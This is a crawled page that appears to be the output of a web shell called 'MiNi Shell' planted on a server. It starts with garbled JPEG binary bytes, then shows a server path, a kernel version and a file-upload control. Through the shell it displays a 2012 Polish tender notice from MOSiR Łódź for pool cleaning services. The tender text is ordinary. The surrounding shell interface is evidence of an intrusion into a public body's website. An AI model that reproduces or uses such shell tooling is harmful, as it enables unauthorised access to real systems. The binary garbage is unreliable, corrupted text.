JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121128/478230-N-2012.html

<p class="kh_header"><b>Łódź: ŚWIADCZENIE USŁUG UTRZYMANIA CZYSTOŚCI W OBIEKTACH PŁYWALNI MOSiR W ŁODZI</b><br>
<b>Numer ogłoszenia: 478230 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Ks. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 27 21 417, faks 42 6367980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG UTRZYMANIA CZYSTOŚCI W OBIEKTACH PŁYWALNI MOSiR W ŁODZI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie czystości na Pływalni WODNY RAJ przy ul. Wiernej Rzeki 2 w części dotyczącej pomieszczeń basenowych, pomieszczeń usługowych, pomieszczeń sauny a także utrzymanie czystości i porządku na Pływalni Odkrytej Wodny Raj i Pływalni odkrytej Promienistych przy ul. Głowackiego 10/12.
Świadczenie usługi odbywać się będzie na terenie pływalni krytej Wodny Raj w okresie 12 miesięcy, na pływalniach odkrytych Wodny Raj i Promienistych w okresie od 30 maja do 31 sierpnia 2013 r. 
Utrzymanie czystości musi odbywać się zgodnie z przepisami sanitarno-epidemiologicznymi. 

I.	Opis obiektów

BUDYNEK PŁYWALNI KRYTEJ WODNY RAJ - łączna powierzchnia 6.522,20 m2
1.	Parter: 
-	terakota - 1.573,60 m2,
-	wykładzina PCV - 14,60 m2,
-	wykładzina dywanowa - 15,20 m2,
-	glazura ścienna - 3.925,00 m2,
2.	Piętro:
-	terakota - 165,30 m2,
-	wykładzina PCV -35,50 m2,
-	glazura ścienna - 443,00 m2,
-	szklane powierzchnie - 350 m2.

PŁYWALNIA ODKRYTA WODNY RAJ - łączna powierzchnia 323,80 m2
1. Pomieszczenia:
-	polbruk - 1901,90 m2
-	lastriko szlifowane - 29,3 m2
-	ceramika - 49,4 m2
-	luksfery - 27,3 m2
-	glazura - 102,5 m2
-	niecki basenu - 611,4 m2

PŁYWALNIA PRZY UL.GŁOWACKIEGO - łączna powierzchnia 392 m2
1. Pomieszczenia:
-	ceramika - 290 m2
-	szklane powierzchnie - 54 m2
-	linoleum - 18 m2
-	niecki prysznicowe - zewnętrzne - 30 m2

II.	Zakres usług:

USŁUGI WYKONYWANE PRZEZ OKRES 12 MIESIĘCY dotyczy opisu obiektu - budynek pływalni krytej
1.	Pomieszczenia basenowe:
a)	mycie i dezynfekcja plaż wokół basenów - codziennie
b)	mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi - codziennie
c)	mycie dna niecki basenu sportowego - 2 razy w roku, basenu rekreacyjnego i basenu zewnętrzno-wewnętrznego - minimum 4 razy w roku, pozostałe zbiorniki znajdujące się na hali - nie rzadziej niż 1 raz na tydzień(w przypadkach awaryjnych częstotliwość mycia zbiorników może ulec zmianie)
d)	mycie wewnętrznych ścian niecek do wysokości lustra wody - codziennie
e)	czyszczenie pionowych ścian zbiorników (niecek) - 2 razy w tygodniu
f)	mycie kratek zakrywających kanały rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu,
g)	mycie kanałów rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu
h)	mycie i dezynfekcja wyposażenia basenu (zjeżdżalnie) - wg potrzeb, nie rzadziej niż 2 razy w tygodniu, schody prowadzące na wieżyczkę zjeżdżalni żółtej i zielonej - codziennie
i)	mycie elementów metalowych poręczy i balustrad, parapetów, murków - codziennie
j)	mycie przeszklonych powierzchni okien i drzwi - wg potrzeb.

UWAGA ! 
W przypadkach awarii urządzeń mogą nastąpić zmiany częstotliwości wykonywania prac, które będą uzgadniane z kierownikiem pływalni pisemnie.

2.	Pomieszczenia usługowe:
a)	holl z szatnią i kasami
b)	szatnie basenowe
c)	toalety oraz prysznice
d)	pomieszczenia gospodarcze
e)	pomieszczenia biurowe
f)	ciągi komunikacyjne
W pomieszczeniach wymienionych w punktach a) - f) wymagane jest stałe utrzymanie czystości.

Zakres prac i czynności:
a)	mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.) 
b)	mycie i dezynfekcja kabin przebieralni
c)	mycie i dezynfekcja powierzchni podłogowych
d)	mycie ścian pokrytych płytkami ceramicznymi,
e)	opróżnianie koszy i wymiana worków foliowych
f)	mycie i dezynfekcja koszy na śmieci z zewnątrz i wewnątrz
g)	mycie i dezynfekcja pojemników na mydło
h)	uzupełnianie mydła w płynie i ręczników jednorazowych
i)	zaopatrywanie toalet w papier toaletowy
j)	mycie luster
k)	mycie i dezynfekcja suszarek do włosów w przebieralniach
l)	mycie ławek w przebieralni i holu
m)	mycie szafek ubraniowych w szatniach
n)	mycie elementów metalowych poręczy, balustrad
o)	mycie parapetów, murków itp.
p)	mycie nogomyj 
Czynności wymienione w punktach a) - p) należy wykonywać wielokrotnie w ciągu dnia 
wg potrzeb.

3.	Pomieszczenia sauny wraz z infrastrukturą:
a)	mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.)
b)	mycie i dezynfekcja powierzchni podłogowych
c)	mycie ścian pokrytych płytkami ceramicznymi
d)	mycie i dezynfekcja sprzętu
e)	mycie elementów metalowych poręczy 
f)	mycie parapetów, murków, itp.
W pomieszczeniach sauny wymagane jest stałe utrzymanie czystości, a czynności wymienione w punktach a - f należy wykonywać wielokrotnie w ciągu dnia wg potrzeb.

III.	USŁUGI WYKONYWANE W SEZONIE LETNIM OKREŚLONYM ZARZĄDZENIEM DYREKTORA MOSIR dotyczy opisu obiektu - pływalnia odkryta Wodny Raj

1.	Pomieszczenia kąpieliska odkrytego.
a)	mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi - codziennie
b)	mycie elementów metalowych poręczy i balustrad, parapetów, murków oraz kolumn natryskowych - 2 razy w tygodniu,
c)	mycie przeszklonych powierzchni okien i drzwi oraz luksferów - wg potrzeb.
d)	mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.) - codziennie,
e)	mycie kabin przebieralni - codziennie, dezynfekcja - 2 razy w tygodniu, 
f)	mycie powierzchni podłogowych - codziennie, dezynfekcja - 2 razy w tygodniu,
g)	opróżnianie koszy i wymiana worków foliowych - codziennie według potrzeb,
h)	mycie i dezynfekcja koszy na śmieci z zewnątrz i wewnątrz - 2 razy w tygodniu,
i)	mycie i dezynfekcja pojemników na mydło, uzupełnianie mydła w płynie, zaopatrywanie toalet w papier toaletowy - codziennie według potrzeb
j)	mycie luster - codziennie
k)	mycie szafek ubraniowych w szatniach - według potrzeb
l)	mycie linii brzegowej (ścian wewnętrznych do wysokości lustra wody) w niecce basenu odkrytego - codziennie,
m)	mycie i dezynfekcja plaż wokół basenów - codziennie,
n)	mycie kratek zakrywających kanały rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu,
o)	mycie kanałów rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu,
p)	mycie zjeżdżalni, nogomyj, schodów - codziennie,
q)	mycie elementów metalowych poręczy i balustrad, murków - codziennie,
r)	przygotowanie terenu utwardzonego (kostka brukowa - zmycie całej powierzchni wodą, usunięcie piasku naniesionego w czasie mycia i eksploatacji basenu),
2.	Przygotowanie kąpieliska (basenu odkrytego) do sezonu letniego.
a)	mycie folii po okresie zimowym w celu przygotowania niecki do sezonu letniego w terminie uzgodnionym z kierownikiem pływalni,
b)	mycie folii po sezonie letnim w celu przygotowania niecki basenu do okresu zimowego w terminie uzgodnionym z kierownikiem pływalni,
c)	mycie krat przelewowych zakrywających koryta przelewowe po okresie zimowym,
d)	mycie zjeżdżalni, nogomyj, schodów,
e)	mycie urządzeń-elementów atrakcji przed zamontowaniem,
f)	przygotowanie terenu utwardzonego (kostka brukowa):
- usunięcie wszelkich porostów i mchów ze szczelin kostki brukowej, mycie kostki brukowej,
- zmycie całej powierzchni terenu utwardzonego wodą,
- usunięcie piasku naniesionego w czasie mycia,

3.	Zaopatrzenie w środki czystości
Bieżące zaopatrzenie węzłów sanitarnych w środki czystości (mydło w płynie, środki zapachowe i dezynfekcyjne), papier toaletowy i ręczniki papierowe w ilościach zapewniających systematyczne uzupełnianie dozowników w w/w środki.
4.	Terminy wykonania poszczególnych prac:
Sprzątanie według określonych powyżej zakresów prac odbywa się 7 dni w tygodniu.
Obiekt pływalni WODNY RAJ otwarty jest dla użytkowników:
Pływalnia kryta:
od poniedziałku do piątku w godzinach 7.00 - 22.00
w soboty w godzinach 10.00 - 22.00
w niedziele i święta w godzinach 9.00 - 21.00
Pływalnia odkryta 
od poniedziałku do niedzieli w godzinach od 10.00 - 18.00

5.	Liczba pracowników:
w ciągu dnia (basen czynny - sprzątanie bieżące): zmiana ranna minimum 2 osoby
zmiana popołudniowa - minimum 1 osoba
w nocy (basen nieczynny - sprzątanie całego basenu) - minimum 3 osoby


IV.	USŁUGI WYKONYWANE W SEZONIE LETNIM OKREŚLONYM ZARZĄDZENIEM DYREKTORA MOSIR - dotyczy opisu obiektu - pływalnia odkryta przy ul Głowackiego

1.	Pomieszczenia obiektu pływalni:

L.p.	Zakres czynności	Określenie czasu	Dodatkowe
1	mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi	codziennie	
2	mycie elementów metalowych poręczy i balustrad, parapetów, murków oraz kolumn natryskowych 	minimum 2 razy w tygodniu	
3	mycie przeszklonych powierzchni okien i drzwi	wg potrzeb	
	mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.) 	na bieżąco przy dużej frekwencji, codziennie w ramach dyżurów	
4	mycie kabin przebieralni 	codziennie	dezynfekcja - minimum 2 razy w tygodniu
5	mycie powierzchni podłogowych	codziennie	dezynfekcja - 2 razy w tygodniu
6	opróżnianie koszy i wymiana worków foliowych 	codziennie i według potrzeb	
7	mycie i dezynfekcja koszy na śmieci 	2 razy w tygodniu	
8	wynoszenie i wymiana pełnych worków na śmieci 	według potrzeb	
9	mycie i dezynfekcja pojemników na mydło, uzupełnianie mydła w płynie, zaopatrywanie toalet w papier toaletowy oraz ręczniki jednorazowe 	codziennie według potrzeb	
10	mycie luster 	codziennie	

2.	Teren zewnętrzny:
Opróżnianie koszy na śmieci i wymiana worków foliowych, przy udziale i pomocy pracownika obiektu.

ZAOPATRZENIE W ŚRODKI CZYSTOŚCI:
Bieżące zaopatrzenie węzłów sanitarnych w worki foliowe (zgodne z pojemnością koszy na obiekcie), oraz środki czystości (mydło w płynie, środki zapachowe i dezynfekcyjne), papier toaletowy i ręczniki papierowe w ilościach zapewniających ich bieżące użytkowanie oraz systematyczne uzupełnianie dozowników w w/w środki.

TERMINY WYKONANIA POSZCZEGÓLNYCH PRAC:
Sprzątanie według określonych powyżej zakresów prac odbywa się 7 dni w tygodniu.
Obiekt Pływalni Promienistych, przy ul. Głowackiego 10/12 udostępniony jest użytkownikom
od poniedziałku do niedzieli w godzinach od 10.00 - 18.00.
Godziny funkcjonowania pływalni mogą ulec zmianie.

Czas oraz godziny sprzątania należy określić w harmonogramie sprzątania stosownie do podanego zakresu czynności, w uzgodnieniu z kierownikiem pływalni.
W przypadku przerw w pracy obiektu, spowodowanych nieprzewidzianymi awariami lub okresem świątecznym, harmonogramy mogą ulec zmianie i zostaną przekształcone w jednozmianowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w ciągu ostatnich 3 lat kalendarzowych (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał, co najmniej jedną usługę zbliżoną zakresem rzeczowym do przedmiotu zamówienia, tj. świadczył usługę utrzymania czystości na pływalni bądź w szpitalu, o powierzchni nie mniejszej niż 6.000 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować minimum 1 sztuką automatu szorująco - zbierającego, minimum 1 sztuką opryskiwacza np. typu SOLO do używania środków do dezynfekcji lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia takiego sprzętu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać polisę ubezpieczeniową na kwotę nie mniejszą niż 200.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji
90-532 Łódź, ul. ks. Skorupki 21
Dział Techniczno-Inwestycyjny pokój 020.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 09:55, miejsce: Miejski Ośrodek Sportu i Rekreacji
90-532 Łódź, ul. ks. Skorupki 21
Sekretariat pokój 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com